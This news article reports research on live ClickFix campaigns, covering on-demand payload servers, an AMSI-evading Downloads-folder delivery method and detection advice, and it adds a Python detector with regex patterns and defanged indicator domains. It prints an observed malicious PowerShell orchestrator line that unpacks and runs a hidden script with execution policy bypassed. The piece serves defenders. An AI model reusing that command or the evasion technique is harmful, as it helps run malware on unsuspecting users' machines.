    Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery

By admin | July 3, 2026 | 5 Mins Read

    ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office.

    New research shows the malicious commands behind its fake “prove you’re human” pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise. The same research also turned up a new delivery method built to slip past Windows’ script scanning.

    Security researcher Bert-Jan Pals took apart several ClickFix platforms and analyzed roughly 3,000 payloads from live campaigns. He presented the findings at OrangeCon in early June and published the details on June 30.

    ClickFix is simple by design. A booby-trapped page shows a fake CAPTCHA or error, hidden JavaScript drops a command into your clipboard, and the page tells you to press a key combo, paste, and hit Enter. You run the malware yourself.

    There’s usually no exploit at the first step and often no file for traditional antivirus to flag, so conventional email and endpoint controls have less to catch.

    It works well enough that ESET measured a 517% jump from late 2024 into the first half of 2025, and Microsoft’s 2025 Digital Defense Report put it at 47% of the initial-access cases seen by its Defender Experts team.

    The technique now has its own entry in MITRE ATT&CK, T1204.004.

    Payloads made to order

    The new part is how the payloads are produced. Pals found the pages pulling their commands from backend servers that work like an on-demand service: they take requests, check an access token, log the caller, and return a freshly scrambled command each time.

    He asked one server for 100 payloads and got 100 different ones, wrapped in a rotating mix of Base64, AES, TripleDES, Rijndael, and Deflate. Strip the wrapping and, at least for now, they all unpack to the same script, which runs in memory through a PowerShell runspace.

    The disguise is disposable; the malware under it is not, though Pals warns the core payload will likely start changing per victim before long. The same platform serves lures in 25 languages and matches the command to the visitor’s operating system, with macOS versions running alongside Windows.

    The “as-a-service” label is not just branding. ESET has tracked criminals selling ready-made ClickFix builders to other attackers. Pals found a parallel commercialization one layer deeper, in how each payload is churned out on request.

    A quieter way in: the Downloads-folder method

    The second finding is a direct answer to defenders who watch the clipboard. Instead of copying a malicious command, the newer pages copy a harmless-looking one.

    The page quietly downloads a file to the Downloads folder, and the clipboard gets a short “orchestrator” line that moves that file, unpacks it, and runs the script inside. Because the pasted line is only that orchestrator and not the payload itself, it is built to slide past AMSI, the Windows feature that lets antivirus scan scripts before they run. The bad code sits in the downloaded file, off to the side. The observed clipboard line looked like this:

powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # \"* I am not a robot reCAPTCHA Verification ID:7947 *\""

    Execution has drifted toward stealth as well. The original 2024 lure told people to press Windows+R and paste into the Run box. A newer version, common through 2025 and into 2026, points them to Windows+X and the Windows Terminal instead. Terminal use looks more ordinary, and unlike the Run box, it leaves no trace in the RunMRU registry key that investigators normally check.

    ClickFix stopped being a criminals-only tool a while ago. Proofpoint tied state-backed groups from Russia, Iran, and North Korea, including APT28, MuddyWater, and Kimsuky, to campaigns that dropped ClickFix into their existing infection chains, and North Korean crews built a fake-job “ClickFake Interview” version to hit cryptocurrency workers.

    The trick has spawned named relatives such as FileFix and DownloadFix that lean on other trusted Windows tools. The scale is not theoretical either: security firm Expel found one ClearFake wave that likely infected as many as 147,521 systems since late August 2025.

    What defenders should watch

    The defensive lesson has not changed. The details have. The dependable signals are process chains, not clipboard text: explorer.exe or WindowsTerminal.exe launching powershell.exe, cmd.exe, or msiexec.exe and reaching out to the network right after.

    Those were the most common launchers in Pals’ data, with PowerShell and cmd tied at about 39% each and msiexec close behind at 34%.

    Behavioral EDR, application-control rules that limit which programs can call script interpreters, and plain user guidance (“never paste a command you were told to run into the Run box or a terminal”) all still hold. The Downloads-folder method adds one more thing to hunt: an innocent-looking one-liner that touches the Downloads folder and then spawns a hidden PowerShell.
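The three signals described above (a launcher such as explorer.exe or WindowsTerminal.exe spawning a script interpreter that then talks to the network, the Downloads-folder orchestrator one-liner, and contact with one of the listed payload servers) can be checked against process and network telemetry. The detector below is an added example written for this article, not code from Pals' research or from any EDR product; the event fields (ts, event, pid, image, parent_image, cmdline, dest_host) are assumptions loosely modelled on Sysmon process-creation and network-connection events, the 30-second "right after" window is an assumption, and the sample events are constructed.

```python
"""Added example: apply the article's ClickFix detection signals to
constructed, Sysmon-style process and network events."""
from dataclasses import dataclass
from typing import Iterable
import re

LAUNCHERS = {"explorer.exe", "windowsterminal.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "msiexec.exe"}
NETWORK_WINDOW_S = 30  # assumption: "right after" taken as 30 seconds

# Defanged payload servers from the article, re-fanged for matching.
PAYLOAD_SERVERS = {d.replace("[.]", ".") for d in
                   ("comicstar[.]lat", "babybon[.]cfd", "merkantalolol[.]asia")}

# Orchestrator shape: a command line that references the Downloads folder
# and then launches a headless/hidden PowerShell running a script file.
DOWNLOADS_RE = re.compile(r"\\downloads\\", re.I)
HIDDEN_PS_RE = re.compile(
    r"(conhost\s+--headless|-windowstyle\s+hidden|-w\s+hidden).*powershell.*(-file|\.ps1)",
    re.I)


@dataclass
class Event:
    ts: float            # seconds (constructed timestamps)
    event: str           # "process" or "network"
    pid: int
    image: str = ""
    parent_image: str = ""
    cmdline: str = ""
    dest_host: str = ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[Event]) -> list[dict]:
    """Return findings as dicts with 'rule', 'pid' and 'detail' keys."""
    findings = []
    pending: dict[int, float] = {}  # pid -> spawn time of launcher->interpreter child
    for e in sorted(events, key=lambda ev: ev.ts):
        if e.event == "process":
            if _basename(e.parent_image) in LAUNCHERS and _basename(e.image) in INTERPRETERS:
                pending[e.pid] = e.ts
            if DOWNLOADS_RE.search(e.cmdline) and HIDDEN_PS_RE.search(e.cmdline):
                findings.append({"rule": "downloads_folder_orchestrator",
                                 "pid": e.pid, "detail": e.cmdline[:80]})
        elif e.event == "network":
            spawned = pending.get(e.pid)
            if spawned is not None and 0 <= e.ts - spawned <= NETWORK_WINDOW_S:
                findings.append({"rule": "launcher_interpreter_network",
                                 "pid": e.pid, "detail": e.dest_host})
                del pending[e.pid]
            if e.dest_host.lower() in PAYLOAD_SERVERS:
                # Per the article: contact shows a command was likely placed in
                # a clipboard, not that the host is infected.
                findings.append({"rule": "payload_server_contact", "pid": e.pid,
                                 "detail": f"{e.dest_host}: clipboard placement likely, not proof of infection"})
    return findings


# Constructed sample telemetry: one benign interactive PowerShell, one
# ClickFix-style chain from Windows Terminal, one cmd.exe whose network
# activity falls well outside the window.
SAMPLE_EVENTS = [
    Event(100.0, "process", 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\explorer.exe", "powershell.exe"),
    Event(200.0, "process", 5200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\WindowsTerminal.exe",
          r'powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";'
          r'tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\""'),
    Event(203.0, "network", 5200, dest_host="comicstar.lat"),
    Event(300.0, "process", 6300, r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd.exe"),
    Event(900.0, "network", 6300, dest_host="updates.example.com"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["rule"], f["pid"], f["detail"])
```

Only the Windows Terminal chain (pid 5200) fires, on all three rules; the interactive PowerShell with no network activity and the cmd.exe whose connection comes ten minutes later stay quiet, which is the point of keying on the chain plus timing rather than on the interpreter alone.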

    Pals also listed three payload servers seen during the research:

    • comicstar[.]lat
    • babybon[.]cfd
    • merkantalolol[.]asia

    A connection to one of these does not prove infection. It means a command was most likely placed in someone’s clipboard.

    Pals’ verdict on the technique is blunt: “ClickFix is here to stay.” The pattern across his research is that ClickFix shifts the moment defenders catch up, and the move from one-off scripts to on-demand payload servers is what keeps that adaptation cheap to repeat.

    The next thing worth watching is whether the malware itself, not just its wrapper, starts changing from one victim to the next.
